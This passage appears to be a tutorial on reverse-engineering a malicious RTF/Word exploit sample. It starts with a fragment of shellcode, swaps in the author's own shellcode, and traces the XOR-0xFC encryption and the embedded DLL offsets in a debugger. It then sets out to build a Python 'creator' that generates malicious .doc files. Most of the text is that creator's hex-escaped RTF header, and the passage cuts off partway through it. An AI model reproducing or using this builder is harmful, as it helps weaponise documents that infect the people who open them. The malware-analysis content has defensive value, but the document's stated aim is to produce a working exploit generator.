code]eb7131c9648b71308b760c8b761c8b5e088b7e208b3666394f1875f2c3608b6c24248b453c8b54287801ea8b4a188b5a2001ebe334498b348b01ee31ff31c0fcac84c07407c1cf0d01c7ebf43b7c242875e18b5a2401eb668b0c4b8b5a1c01eb8b048b01e88944241c61c3e892ffffff5deb05e8f3ffffff89ef83ef8989ee83. [/TD] [/TR] [/TABLE] So I will replace the existing shell code with our own code. After replacing, the sample looks like this: Now, after executing it, it should execute calc. Wow, calc pops up. Now it’s time to analyze the drop dll, which has been dropped into system32 with the name of dhcpsrv.dll. After analyzing, we see that the exploit sample is dropping dhcpsrv.dll in c:\windows\system32 folder, as in picture, and that is going to be executed by rundll32.exe. We will analyze the dropped dll (dhcpsrv.dll) further, but first we have to attach it with debugger. There is a process in attaching debugger. I am going to attach it with WinWord, as it is an Office document file. After attaching and before executing, we have to set a breakpoint (F2) in debugger on various win32 function. Here you will get a clear picture once you reverse two or three samples yourself. I am going to write here the common functions that are desirable to set a breakpoint before reversing. They are: CreateFile, ReadFile, WriteFile, SetFilePointer, LoadLibraryA, LoadLIbrary, etc. After setting a breakpoint, we have to Step Over (F8 ) in debugger and while doing this we will have to look carefully for some suspicious address in the stack windows of debugger (bottom right). We mainly analyze the load library function also and, while analyzing, we look to see if there is any library or any function get loaded by some suspicious address (“suspicious” means an address that does not belong to the kernel ). After a long analysis, we find that the CreateFile function gets loaded at a suspicious address, that is, The CreateFile function gets loaded at the suspicious address (0011f438). A point to be noted is that this address may change from computer to computer. Now our main job should be to find the actual location of the embedded dll/exe, that is the start location of exe/dll, the end location, the size of the embedded exe/dll, and the algorithm by which exe/dll has been encrypted. We will start analyzing line by line from the beginning of the suspicious address. In the above picture, look at the stack windows. There is a call to CreateFileA function from address 0011F438. Now our next work is to start analyzing from this address, so we will set a Break Point at 0011F438. The CreateFile function gets loaded at the suspicious address (0011f438). Note that this address may change from computer to computer. Now our main job should be to find the actual location of the embedded dll/exe, that is start location and end location of exe/dll, and the algorithm by which exe/dll has been encrypted. To do that, we will start analyzing line by line from the beginning of the suspicious address. We find the following instruction: 00115F4E AC LODS BYTE PTR DS : [ESI] 0011F54F 3C 00 CMP AL, 0 0011F551 74 06 JE SHORT 0011F559 0011F553 3C FC CMP AL, 0FC 0011F555 74 02 JE SHORT 0011F559 0011F557 34 FC XOR AL, 0FC 0011F559 AA STOS BYTE PTR ES : [EDI] 0011F55A E2 F2 LOOPD SHORT 0011F54E Let’s look at the two boldfaced instructions: 00115F4E AC LODS BYTE PTR DS : [ESI] This instruction reads the address stored at ESI and stores its value to EAX, while the instruction 0011F559 AA STOS BYTE PTR ES : [EDI] stores the value of EAX to the EDI . So the encryption algorithm is to read each byte of exe; if it is 0 or OFC then leave it as it is, if not then XOR with OFC as in the instruction 0011F557 34 FC XOR AL, 0FC So we found the encryption. The next steps is to find the start, end, and size of the exe. This can be found in a function like SetFilePointer. But in this sample we found this information by doing some manual analysis, as you can see in dump windows: There is some sequence of values with ASCII 6161616161, etc.; let’s search this value in the Hex of the exploit sample: While analyzing in the dump window of the debugger, we found that the decryption starts after }}}} (4 curly braces in dump ), so let’s move into hex to decrypt the value and try to find MZ (as MZ is the start header of the PE file ). If MZ is found, it indicates that this is the beginning of exe. Now what is the total size of exe? For that, we have to check the file that’s dropped into c:/windows/system32 dhcpsrv.dll, open it in the hex editor, and find the total size; this will be the total size of exe/dll. We find the total size of dll is DLL ADD8 in hex, 44504 in decimal. So now we have found: Encryption algorithm Start Location of dll/exe End location of dll/exe Now our main job is to write the creator with proper encryption key and start and end location. That will generate a malicious .doc file. The creator could be written in any scripting language, that is, Python, Perl, etc. I have chosen Python to write the creator, as I explain below. The point where MZ is found is the start point of exe. Anyway, while analyzing this sample, one can get confused about where to insert our own payload. Do keep in the mind that you have to replace the shell code at the server.exe shell code, not at the place where it is dropped in the system32 (dll file ). So now it’s time to write the full creator code that I have written in Python. Here is the full creator: import datetime import os header = ("\x7B\x5C\x72\x74\x66\x31\x5C\x61\x64\x65\x66\x6C\x61\x6E\x67\x31" "\x30\x32\x35\x5C\x61\x6E\x73\x69\x5C\x61\x6E\x73\x69\x63\x70\x67" "\x39\x33\x36\x5C\x75\x63\x32\x5C\x61\x64\x65\x66\x66\x30\x5C\x64" "\x65\x66\x66\x30\x5C\x73\x74\x73\x68\x66\x64\x62\x63\x68\x31\x33" "\x5C\x73\x74\x73\x68\x66\x6C\x6F\x63\x68\x30\x5C\x73\x74\x73\x68" "\x66\x68\x69\x63\x68\x30\x5C\x73\x74\x73\x68\x66\x62\x69\x30\x5C" "\x64\x65\x66\x6C\x61\x6E\x67\x31\x30\x33\x33\x5C\x64\x65\x66\x6C" "\x61\x6E\x67\x66\x65\x32\x30\x35\x32\x7B\x5C\x66\x6F\x6E\x74\x74" "\x62\x6C\x7B\x5C\x66\x30\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63" "\x68\x61\x72\x73\x65\x74\x30\x5C\x66\x70\x72\x71\x32\x7B\x5C\x2A" "\x5C\x70\x61\x6E\x6F\x73\x65\x20\x30\x32\x30\x32\x30\x36\x30\x33" "\x30\x35\x30\x34\x30\x35\x30\x32\x30\x33\x30\x34\x7D\x54\x69\x6D" "\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x3B\x7D\x7B\x5C" "\x66\x31\x33\x5C\x66\x6E\x69\x6C\x5C\x66\x63\x68\x61\x72\x73\x65" "\x74\x31\x33\x34\x5C\x66\x70\x72\x71\x32\x7B\x5C\x2A\x5C\x70\x61" "\x6E\x6F\x73\x65\x20\x30\x32\x30\x31\x30\x36\x30\x30\x30\x33\x30" "\x31\x30\x31\x30\x31\x30\x31\x30\x31\x7D\x5C\x27\x63\x62\x5C\x27" "\x63\x65\x5C\x27\x63\x63\x5C\x27\x65\x35\x7B\x5C\x2A\x5C\x66\x61" "\x6C\x74\x20\x53\x69\x6D\x53\x75\x6E\x7D\x3B\x7D\x0D\x0A\x7B\x5C" "\x66\x33\x36\x5C\x66\x6E\x69\x6C\x5C\x66\x63\x68\x61\x72\x73\x65" "\x74\x31\x33\x34\x5C\x66\x70\x72\x71\x32\x7B\x5C\x2A\x5C\x70\x61" "\x6E\x6F\x73\x65\x20\x30\x32\x30\x31\x30\x36\x30\x30\x30\x33\x30" "\x31\x30\x31\x30\x31\x30\x31\x30\x31\x7D\x40\x5C\x27\x63\x62\x5C" "\x27\x63\x65\x5C\x27\x63\x63\x5C\x27\x65\x35\x3B\x7D\x7B\x5C\x66" "\x33\x37\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73" "\x65\x74\x32\x33\x38\x5C\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65" "\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x43\x45\x3B\x7D" "\x7B\x5C\x66\x33\x38\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68" "\x61\x72\x73\x65\x74\x32\x30\x34\x5C\x66\x70\x72\x71\x32\x20\x54" "\x69\x6D\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x43" "\x79\x72\x3B\x7D\x7B\x5C\x66\x34\x30\x5C\x66\x72\x6F\x6D\x61\x6E" "\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x36\x31\x5C\x66\x70\x72" "\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D" "\x61\x6E\x20\x47\x72\x65\x65\x6B\x3B\x7D\x0D\x0A\x7B\x5C\x66\x34" "\x31\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65" "\x74\x31\x36\x32\x5C\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73" "\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x54\x75\x72\x3B\x7D" "\x7B\x5C\x66\x34\x32\x5C\x66\x62\x69\x64\x69\x20\x5C\x66\x72\x6F" "\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x37\x37\x5C" "\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65\x77\x20" "\x52\x6F\x6D\x61\x6E\x20\x28\x48\x65\x62\x72\x65\x77\x29\x3B\x7D" "\x7B\x5C\x66\x34\x33\x5C\x66\x62\x69\x64\x69\x20\x5C\x66\x72\x6F" "\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x37\x38\x5C" "\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65\x77\x20" "\x52\x6F\x6D\x61\x6E\x20\x28\x41\x72\x61\x62\x69\x63\x29\x3B\x7D" "\x7B\x5C\x66\x34\x34\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68" "\x61\x72\x73\x65\x74\x31\x38\x36\x5C\x66\x70\x72\x71\x32\x20\x54" "\x69\x6D\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x42" "\x61\x6C\x74\x69\x63\x3B\x7D\x0D\x0A\x7B\x5C\x66\x34\x35\x5C\x66" "\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x36" "\x33\x5C\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65" "\x77\x20\x52\x6F\x6D\x61\x6E\x20\x28\x56\x69\x65\x74\x6E\x61\x6D" "\x65\x73\x65\x29\x3B\x7D\x7B\x5C\x66\x31\x36\x39\x5C\x66\x6E\x69" "\x6C\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x30\x5C\x66\x70\x72\x71" "\x32\x20\x53\x69\x6D\x53\x75\x6E\x20\x57\x65\x73\x74\x65\x72\x6E" "\x7B\x5C\x2A\x5C\x66\x61\x6C\x74\x20\x53\x69\x6D\x53\x75\x6E\x7D" "\x3B\x7D\x7B\x5C\x66\x33\x39\x39\x5C\x66\x6E\x69\x6C\x5C\x66\x63" "\x68\x61\x72\x73\x65\x74\x30\x5C\x66\x70\x72\x71\x32\x20\x40\x5C" "\x27\x63\x62\x5C\x27\x63\x65\x5C\x27\x63\x63\x5C\x27\x65\x35\x20" "\x57\x65\x73\x74\x65\x72\x6E\x3B\x7D\x7D\x7B\x5C\x63\x6F\x6C\x6F" "\x72\x74\x62\x6C\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72\x65\x65\x6E" "\x30\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72" "\x65\x65\x6E\x30\x5C\x62\x6C\x75\x65\x32\x35\x35\x3B\x5C\x72\x65" "\x64\x30\x5C\x67\x72\x65\x65\x6E\x32\x35\x35\x5C\x62\x6C\x75\x65" "\x32\x35\x35\x3B\x0D\x0A\x5C\x72\x65\x64\x30\x5C\x67\x72\x65\x65" "\x6E\x32\x35\x35\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x32" "\x35\x35\x5C\x67\x72\x65\x65\x6E\x30\x5C\x62\x6C\x75\x65\x32\x35" "\x35\x3B\x5C\x72\x65\x64\x32\x35\x35\x5C\x67\x72\x65\x65\x6E\x30" "\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x32\x35\x35\x5C\x67" "\x72\x65\x65\x6E\x32\x35\x35\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72" "\x65\x64\x32\x35\x35\x5C\x67\x72\x65\x65\x6E\x32\x35\x35\x5C\x62" "\x6C\x75\x65\x32\x35\x35\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72\x65" "\x65\x6E\x30\x5C\x62\x6C\x75\x65\x31\x32\x38\x3B\x5C\x72\x65\x64" "\x30\x5C\x67\x72\x65\x65\x6E\x31\x32\x38\x5C\x62\x6C\x75\x65\x31" "\x32\x38\x3B\x5C\x72\x65\x64\x30\x5C\x67\x72\x65\x65\x6E\x31\x32" "\x38\x5C\x62\x6C\x75\x65\x30\x3B\x5C\x72\x65\x64\x31\x32\x38\x5C" "\x67\x72\x65\x65\x6E\x30\x5C\x62\x6C\x75\x65\x31\x32\x38\x3B\x5C" "\x72\x65\x64\x31\x32\x38\x5C\x67\x72\x65\x65\x6E\x30\x5C\x62\x6C" "\x75\x65\x30\x3B\x5C\x72\x65\x64\x31\x32\x38\x5C\x67\x72\x65\x65" "\x6E\x31\x32\x38\x5C\x62\x6C\x75\x65\x30\x3B\x0D\x0A\x5C\x72\x65" "\x64\x31\x32\x38\x5C\x67\x72\x65\x65\x6E\x31\x32\x38\x5C\x62\x6C" "\x75\x65\x31\x32\x38\x3B\x5C\x72\x65\x64\x31\x39\x32\x5C\x67\x72" "\x65\x65\x6E\x31\x39\x32\x5C\x62\x6C\x75\x65\x31\x39\x32\x3B\x7D" "\x7B\x5C\x73\x74\x79\x6C\x65\x73\x68\x65\x65\x74\x7B\x5C\x71\x6A" "\x20\x5C\x6C\x69\x30\x5C\x72\x69\x30\x5C\x6E\x6F\x77\x69\x64\x63" "\x74\x6C\x70\x61\x72\x5C\x77\x72\x61\x70\x64\x65\x66\x61\x75\x6C" "\x74\x5C\x61\x73\x70\x61\x6C\x70\x68\x61\x5C\x61\x73\x70\x6E\x75" "\x6D\x5C\x66\x61\x61\x75\x74\x6F\x5C\x61\x64\x6A\x75\x73\x74\x72" "\x69\x67\x68\x74\x5C\x72\x69\x6E\x30\x5C\x6C\x69\x6E\x30\x5C\x69" "\x74\x61\x70\x30\x20\x5C\x72\x74\x6C\x63\x68\x5C\x66\x63\x73\x31" "\x20\x5C\x61\x66\x30\x5C\x61\x66\x73\x32\x34\x5C\x61\x6C\x61\x6E" "\x67\x31\x30\x32\x35\x20\x5C\x6C\x74\x72\x63\x68\x5C\x66\x63\x73" "\x30\x20\x0D\x0A\x5C\x66\x73\x32\x31\x5C\x6C\x61\x6E\x67\x31\x30" "\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65\x32\x30\x35\x32\x5C\x6B\x65" "\x72\x6E\x69\x6E\x67\x32\x5C\x6C\x6F\x63\x68\x5C\x66\x30\x5C\x68" "\x69\x63\x68\x5C\x61\x66\x30\x5C\x64\x62\x63\x68\x5C\x61\x66\x31" "\x33\x5C\x63\x67\x72\x69\x64\x5C\x6C\x61\x6E\x67\x6E\x70\x31\x30" "\x33\x33\x5C\x6C\x61\x6E\x67\x66\x65\x6E\x70\x32\x30\x35\x32\x20" "\x5C\x73\x6E\x65\x78\x74\x30\x20\x4E\x6F\x72\x6D\x61\x6C\x3B\x7D" "\x7B\x5C\x2A\x5C\x63\x73\x31\x30\x20\x5C\x61\x64\x64\x69\x74\x69" "\x76\x65\x20\x5C\x73\x73\x65\x6D\x69\x68\x69\x64\x64\x65\x6E\x20" "\x44\x65\x66\x61\x75\x6C\x74\x20\x50\x61\x72\x61\x67\x72\x61\x70" "\x68\x20\x46\x6F\x6E\x74\x3B\x7D\x7B\x5C\x2A\x0D\x0A\x5C\x74\x73" "\x31\x31\x5C\x74\x73\x72\x6F\x77\x64\x5C\x74\x72\x66\x74\x73\x57" "\x69\x64\x74\x68\x42\x33\x5C\x74\x72\x70\x61\x64\x64\x6C\x31\x30" "\x38\x5C\x74\x72\x70\x61\x64\x64\x72\x31\x30\x38\x5C\x74\x72\x70" "\x61\x64\x64\x66\x6C\x33\x5C\x74\x72\x70\x61\x64\x64\x66\x74\x33" "\x5C\x74\x72\x70\x61\x64\x64\x66\x62\x33\x5C\x74\x72\x70\x61\x64" "\x64\x66\x72\x33\x5C\x74\x72\x63\x62\x70\x61\x74\x31\x5C\x74\x72" "\x63\x66\x70\x61\x74\x31\x5C\x74\x62\x6C\x69\x6E\x64\x30\x5C\x74" "\x62\x6C\x69\x6E\x64\x74\x79\x70\x65\x33\x5C\x74\x73\x63\x65\x6C" "\x6C\x77\x69\x64\x74\x68\x66\x74\x73\x30\x5C\x74\x73\x76\x65\x72" "\x74\x61\x6C\x74\x5C\x74\x73\x62\x72\x64\x72\x74\x5C\x74\x73\x62" "\x72\x64\x72\x6C\x5C\x74\x73\x62\x72\x64\x72\x62\x5C\x74\x73\x62" "\x72\x64\x72\x72\x5C\x74\x73\x62\x72\x64\x72\x64\x67\x6C\x5C\x74" "\x73\x62\x72\x64\x72\x64\x67\x72\x5C\x74\x73\x62\x72\x64\x72\x68" "\x5C\x74\x73\x62\x72\x64\x72\x76\x20\x0D\x0A\x5C\x71\x6C\x20\x5C" "\x6C\x69\x30\x5C\x72\x69\x30\x5C\x77\x69\x64\x63\x74\x6C\x70\x61" "\x72\x5C\x77\x72\x61\x70\x64\x65\x66\x61\x75\x6C\x74\x5C\x61\x73" "\x70\x61\x6C\x70\x68\x61\x5C\x61\x73\x70\x6E\x75\x6D\x5C\x66\x61" "\x61\x75\x74\x6F\x5C\x61\x64\x6A\x75\x73\x74\x72\x69\x67\x68\x74" "\x5C\x72\x69\x6E\x30\x5C\x6C\x69\x6E\x30\x5C\x69\x74\x61\x70\x30" "\x20\x5C\x72\x74\x6C\x63\x68\x5C\x66\x63\x73\x31\x20\x5C\x61\x66" "\x30\x5C\x61\x66\x73\x32\x30\x20\x5C\x6C\x74\x72\x63\x68\x5C\x66" "\x63\x73\x30\x20\x5C\x66\x73\x32\x30\x5C\x6C\x61\x6E\x67\x31\x30" "\x32\x34\x5C\x6C\x61\x6E\x67\x66\x65\x31\x30\x32\x34\x5C\x6C\x6F" "\x63\x68\x5C\x66\x30\x5C\x68\x69\x63\x68\x5C\x61\x66\x30\x5C\x64" "\x62\x63\x68\x5C\x61\x66\x31\x33\x5C\x63\x67\x72\x69\x64\x5C\x6C" "\x61\x6E\x67\x6E\x70\x31\x30\x32\x34\x5C\x6C\x61\x6E\x67\x66\x65" "\x6E\x70\x31\x30\x32\x34\x20\x5C\x73\x6E\x65\x78\x74\x31\x31\x20" "\x5C\x73\x73\x65\x6D\x69\x68\x69\x64\x64\x65\x6E\x20\x4E\x6F\x72" "\x6D\x61\x6C\x20\x54\x61\x62\x6C\x65\x3B\x7D\x7D\x0D\x0A\x7B\x5C" "\x2A\x5C\x6C\x61\x74\x65\x6E\x74\x73\x74\x79\x6C\x65\x73\x5C\x6C" "\x73\x64\x73\x74\x69\x6D\x61\x78\x31\x35\x36\x5C\x6C\x73\x64\x6C" "\x6F\x63\x6B\x65\x64\x64\x65\x66\x30\x7D\x7B\x5C\x2A\x5C\x72\x73" "\x69\x64\x74\x62\x6C\x20\x5C\x72\x73\x69\x64\x31\x35\x38\x30\x37" "\x35\x31\x39\x7D\x7B\x5C\x2A\x5C\x67\x65\x6E\x65\x72\x61\x74\x6F" "\x72\x20\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x20\x57\x6F\x72\x64" "\x20\x31\x31\x2E\x30\x2E\x30\x30\x30\x30\x3B\x7D\x7B\x5C\x69\x6E" "\x66\x6F\x7B\x5C\x74\x69\x74\x6C\x65\x20\x46\x66\x66\x66\x66\x66" "\x66\x66\x66\x7D\x7B\x5C\x61\x75\x74\x68\x6F\x72\x20\x55\x53\x45" "\x52\x7D\x7B\x5C\x6F\x70\x65\x72\x61\x74\x6F\x72\x20\x55\x53\x45" "\x52\x7D\x7B\x5C\x63\x72\x65\x61\x74\x69\x6D\x5C\x79\x72\x32\x30" "\x31\x31\x5C\x6D\x6F\x34\x5C\x64\x79\x31\x32\x5C\x68\x72\x31\x34" "\x5C\x6D\x69\x6E\x35\x30\x7D\x7B\x5C\x72\x65\x76\x74\x69\x6D\x5C" "\x79\x72\x32\x30\x31\x31\x5C\x6D\x6F\x34\x5C\x64\x79\x31\x32\x5C" "\x68\x72\x31\x34\x5C\x6D\x69\x6E\x35\x31\x7D\x7B\x5C\x76\x65\x72" "\x73\x69\x6F\x6E\x31\x7D\x0D\x0A\x7B\x5C\x65\x64\x6D\x69\x6E\x73" "\x31\x7D\x7B\x5C\x6E\x6F\x66\x70\x61\x67\x65\x73\x31\x7D\x7B\x5C" "\x6E\x6F\x66\x77\x6F\x72\x64\x73\x31\x7D\x7B\x5C\x6E\x6F\x66\x63" "\x68\x61\x72\x73\x39\x7D\x7B\x5C\x2A\x5C\x63\x6F\x6D\x70\x61\x6E" "\x79\x20\x43\x48\x49\x4E\x41\x7D\x7B\x5C\x6E\x6F\x66\x63\x68\x61" "\x72\x73\x77\x73\x39\x7D\x7B\x5C\x76\x65\x72\x6E\x32\x34\x36\x31" "\x33\x7D\x7B\x5C\x2A\x5C\x70\x61\x73\x73\x77\x6F\x72\x64\x20\x30" "\x30\x30\x30\x30\x30\x30\x30\x7D\x7D\x7B\x5C\x2A\x5C\x78\x6D\x6C" "\x6E\x73\x74\x62\x6C\x20\x7B\x5C\x78\x6D\x6C\x6E\x73\x31\x20\x68" "\x74\x74\x70\x3A\x2F\x2F\x73\x63\x68\x65\x6D\x61\x73\x2E\x6D\x69" "\x63\x72\x6F\x73\x6F\x66\x74\x2E\x63\x6F\x6D\x2F\x6F\x66\x66\x69" "\x63\x65\x2F\x77\x6F\x72\x64\x2F\x32\x30\x30\x33\x2F\x77\x6F\x72" "\x64\x6D\x6C\x7D\x7D\x0D\x0A\x5C\x70\x61\x70\x65\x72\x77\x31\x31" "\x39\x30\x36\x5C\x70\x61\x70\x65\x72\x68\x31\x36\x38\x33\x38\x5C" "\x6D\x61\x72\x67\x6C\x31\x38\x30\x30\x5C\x6D\x61\x72\x67\x72\x31" "\x38\x30\x30\x5C\x6D\x61\x72\x67\x74\x31\x34\x34\x30\x5C\x6D\x61" "\x72\x67\x62\x31\x34\x34\x30\x5C\x67\x75\x74\x74\x65\x72\x30\x5C" "\x6C\x74\x72\x73\x65\x63\x74\x20\x0D\x0A\x5C\x64\x65\x66\x74\x61" "\x62\x34\x32\x30\x5C\x66\x74\x6E\x62\x6A\x5C\x61\x65\x6E\x64\x64" "\x6F\x63\x5C\x64\x6F\x6E\x6F\x74\x65\x6D\x62\x65\x64\x73\x79\x73" "\x66\x6F\x6E\x74\x31\x5C\x64\x6F\x6E\x6F\x74\x65\x6D\x62\x65\x64" "\x6C\x69\x6E\x67\x64\x61\x74\x61\x30\x5C\x67\x72\x66\x64\x6F\x63" "\x65\x76\x65\x6E\x74\x73\x30\x5C\x76\x61\x6C\x69\x64\x61\x74\x65" "\x78\x6D\x6C\x31\x5C\x73\x68\x6F\x77\x70\x6C\x61\x63\x65\x68\x6F" "\x6C\x64\x74\x65\x78\x74\x30\x5C\x69\x67\x6E\x6F\x72\x65\x6D\x69" "\x78\x65\x64\x63\x6F\x6E\x74\x65\x6E\x74\x30\x5C\x73\x61\x76\x65" "\x69\x6E\x76\x61\x6C\x69\x64\x78\x6D\x6C\x30\x5C\x73\x68\x6F\x77" "\x78\x6D\x6C\x65\x72\x72\x6F\x72\x73\x31\x5C\x66\x6F\x72\x6D\x73" "\x68\x61\x64\x65\x5C\x68\x6F\x72\x7A\x64\x6F\x63\x5C\x64\x67\x6D" "\x61\x72\x67\x69\x6E\x5C\x64\x67\x68\x73\x70\x61\x63\x65\x31\x38" "\x30\x5C\x64\x67\x76\x73\x70\x61\x63\x65\x31\x35\x36\x5C\x64\x67" "\x68\x6F\x72\x69\x67\x69\x6E\x31\x38\x30\x30\x5C\x64\x67\x76\x6F" "\x72\x69\x67\x69\x6E\x31\x34\x34\x30\x5C\x64\x67\x68\x73\x68\x6F" "\x77\x30\x0D\x0A\x5C\x64\x67\x76\x73\x68\x6F\x77\x32\x5C\x6A\x63" "\x6F\x6D\x70\x72\x65\x73\x73\x5C\x6C\x6E\x6F\x6E\x67\x72\x69\x64" "\x5C\x76\x69\x65\x77\x6B\x69\x6E\x64\x31\x5C\x76\x69\x65\x77\x73" "\x63\x61\x6C\x65\x31\x30\x30\x5C\x73\x70\x6C\x79\x74\x77\x6E\x69" "\x6E\x65\x5C\x66\x74\x6E\x6C\x79\x74\x77\x6E\x69\x6E\x65\x5C\x68" "\x74\x6D\x61\x75\x74\x73\x70\x5C\x75\x73\x65\x6C\x74\x62\x61\x6C" "\x6E\x5C\x61\x6C\x6E\x74\x62\x6C\x69\x6E\x64\x5C\x6C\x79\x74\x63" "\x61\x6C\x63\x74\x62\x6C\x77\x64\x5C\x6C\x79\x74\x74\x62\x6C\x72" "\x74\x67\x72\x5C\x6C\x6E\x62\x72\x6B\x72\x75\x6C\x65\x5C\x6E\x6F" "\x62\x72\x6B\x77\x72\x70\x74\x62\x6C\x5C\x76\x69\x65\x77\x6E\x6F" "\x62\x6F\x75\x6E\x64\x31\x5C\x73\x6E\x61\x70\x74\x6F\x67\x72\x69" "\x64\x69\x6E\x63\x65\x6C\x6C\x5C\x61\x6C\x6C\x6F\x77\x66\x69\x65" "\x6C\x64\x65\x6E\x64\x73\x65\x6C\x5C\x77\x72\x70\x70\x75\x6E\x63" "\x74\x5C\x61\x73\x69\x61\x6E\x62\x72\x6B\x72\x75\x6C\x65\x5C\x72" "\x73\x69\x64\x72\x6F\x6F\x74\x31\x35\x38\x30\x37\x35\x31\x39\x0D" "\x0A\x5C\x6E\x65\x77\x74\x62\x6C\x73\x74\x79\x72\x75\x6C\x73\x5C" "\x6E\x6F\x67\x72\x6F\x77\x61\x75\x74\x6F\x66\x69\x74\x20\x7B\x5C" "\x2A\x5C\x66\x63\x68\x61\x72\x73\x20\x0D\x0A\x21\x29\x2C\x2E\x3A" "\x5C\x27\x33\x62\x3F\x5D\x5C\x27\x37\x64\x5C\x27\x61\x31\x5C\x27" "\x61\x37\x5C\x27\x61\x31\x5C\x27\x61\x34\x5C\x27\x61\x31\x5C\x27" "\x61\x36\x5C\x27\x61\x31\x5C\x27\x61\x35\x5C\x27\x61\x38\x5C\x27" "\x34\x34\x5C\x27\x61\x31\x5C\x27\x61\x63\x5C\x27\x61\x31\x5C\x27" "\x61\x66\x5C\x27\x61\x31\x5C\x27\x62\x31\x5C\x27\x61\x31\x5C\x27" "\x61\x64\x5C\x27\x61\x31\x5C\x27\x63\x33\x5C\x27\x61\x31\x5C\x27" "\x61\x32\x5C\x27\x61\x31\x5C\x27\x61\x33\x5C\x27\x61\x31\x5C\x27" "\x61\x38\x5C\x27\x61\x31\x5C\x27\x61\x39\x5C\x27\x61\x31\x5C\x27" "\x62\x35\x5C\x27\x61\x31\x5C\x27\x62\x37\x5C\x27\x61\x31\x5C\x27" "\x62\x39\x5C\x27\x61\x31\x5C\x27\x62\x62\x5C\x27\x61\x31\x5C\x27" "\x62\x66\x5C\x27\x61\x31\x5C\x27\x62\x33\x5C\x27\x61\x31\x5C\x27" "\x62\x64\x5C\x27\x61\x33\x5C\x27\x61\x31\x5C\x27\x61\x33\x5C\x27" "\x61\x32\x5C\x27\x61\x33\x5C\x27\x61\x37\x5C\x27\x61\x33\x5C\x27" "\x61\x39\x5C\x27\x61\x33\x5C\x27\x61\x63\x5C\x27\x61\x33\x5C\x27" "\x61\x65\x5C\x27\x61\x33\x5C\x27\x62\x61\x5C\x27\x61\x33\x5C\x27" "\x62\x62\x5C\x27\x61\x33\x5C\x27\x62\x66\x5C\x27\x61\x33\x5C\x27" "\x64\x64\x5C\x27\x61\x33\x5C\x27\x65\x30\x5C\x27\x61\x33\x5C\x27" "\x66\x63\x5C\x27\x61\x33\x5C\x27\x66\x64\x5C\x27\x61\x31\x5C\x27" "\x61\x62\x5C\x27\x61\x31\x5C\x27\x65\x39\x0D\x0A\x7D\x7B\x5C\x2A" "\x5C\x6C\x63\x68\x61\x72\x73\x20\x28\x5B\x5C\x27\x37\x62\x5C\x27" "\x61\x31\x5C\x27\x61\x34\x5C\x27\x61\x31\x5C\x27\x61\x65\x5C\x27" "\x61\x31\x5C\x27\x62\x30\x5C\x27\x61\x31\x5C\x27\x62\x34\x5C\x27" "\x61\x31\x5C\x27\x62\x36\x5C\x27\x61\x31\x5C\x27\x62\x38\x5C\x27" "\x61\x31\x5C\x27\x62\x61\x5C\x27\x61\x31\x5C\x27\x62\x65\x5C\x27" "\x61\x31\x5C\x27\x62\x32\x5C\x27\x61\x31\x5C\x27\x62\x63\x5C\x27" "\x61\x33\x5C\x27\x61\x38\x5C\x27\x61\x33\x5C\x27\x61\x65\x5C\x27" "\x61\x33\x5C\x27\x64\x62\x5C\x27\x61\x33\x5C\x27\x66\x62\x5C\x27" "\x61\x31\x5C\x27\x65\x61\x5C\x27\x61\x33\x5C\x27\x61\x34\x7D\x5C" "\x66\x65\x74\x30\x7B\x5C\x2A\x5C\x77\x67\x72\x66\x66\x6D\x74\x66" "\x69\x6C\x74\x65\x72\x20\x30\x31\x33\x66\x7D\x5C\x69\x6C\x66\x6F" "\x6D\x61\x63\x61\x74\x63\x6C\x6E\x75\x70\x30\x5C\x6C\x74\x72\x70" "\x61\x72\x20\x5C\x73\x65\x63\x74\x64\x20\x5C\x6C\x74\x72\x73\x65" "\x63\x74\x0D\x0A\x5C\x6C\x69\x6E\x65\x78\x30\x5C\x68\x65\x61\x64" "\x65\x72\x79\x38\x35\x31\x5C\x66\x6F\x6F\x74\x65\x72\x79\x39\x39" "\x32\x5C\x63\x6F\x6C\x73\x78\x34\x32\x35\x5C\x65\x6E\x64\x6E\x68" "\x65\x72\x65\x5C\x73\x65\x63\x74\x6C\x69\x6E\x65\x67\x72\x69\x64" "\x33\x31\x32\x5C\x73\x65\x63\x74\x73\x70\x65\x63\x69\x66\x79\x6C" "\x5C\x73\x66\x74\x6E\x62\x6A\x20\x7B\x5C\x2A\x5C\x70\x6E\x73\x65" "\x63\x6C\x76\x6C\x31\x5C\x70\x6E\x75\x63\x72\x6D\x5C\x70\x6E\x73" 